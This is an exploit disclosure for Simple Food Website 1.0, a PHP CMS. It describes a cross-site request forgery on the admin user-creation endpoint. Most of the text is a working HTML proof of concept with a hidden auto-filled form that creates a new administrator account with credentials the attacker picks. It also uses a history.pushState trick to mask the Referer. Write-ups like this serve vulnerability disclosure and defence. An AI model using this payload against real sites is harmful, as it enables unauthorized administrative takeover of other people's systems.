# Exploit Title: Simple Food Website 1.0 : Account Takeover via CSRF
### Date: 25-04-2022
### Exploit Author: Saket Saurav
### Vendor Homepage: https://www.sourcecodester.com/php/12510/simple-food-website-php.html
### Software Link: https://www.sourcecodester.com/download-code?nid=12510&title=Simple+Food+Website+%28CMS%29+in+PHP+with+Source+Code
### Version: 1.0
### Tested on: Kali Linux 2020
### Description : The attacker hosts the crafted HTML page below and gets the administrator to open it. If the admin is logged in to the portal in the same browser and submits the form, the browser sends the POST to admin/save_user.php with the admin's session cookie attached. The application performs no anti-CSRF check on that endpoint, so a new user with position "Admin" and attacker-chosen credentials is created, giving the attacker administrator access to the portal.
Below is the PoC (exploit.html). The form targets the admin user-creation endpoint with the same fields the application expects; the victim's browser adds the admin session cookie to the cross-site POST, so the attacker never needs to authenticate.
<html>
<!-- CSRF PoC - generated by saket saurav -->
<body>
<!-- Rewrite the visible URL to "/" so the Referer sent with the POST does not reveal the path of the hosting page -->
<script>history.pushState('', '', '/')</script>
<!-- No anti-CSRF token field is included: the endpoint does not require one -->
<form action="http://127.0.0.1/food/admin/save_user.php" method="POST" enctype="multipart/form-data">
<!-- &#95; is "_" and &#32; is a space: the field is full_name with value "csrf user" -->
<input type="hidden" name="full&#95;name" value="csrf&#32;user" />
<input type="hidden" name="username" value="csrf" />
<input type="hidden" name="password" value="csrf" />
<!-- Role assigned to the new account -->
<input type="hidden" name="position" value="Admin" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>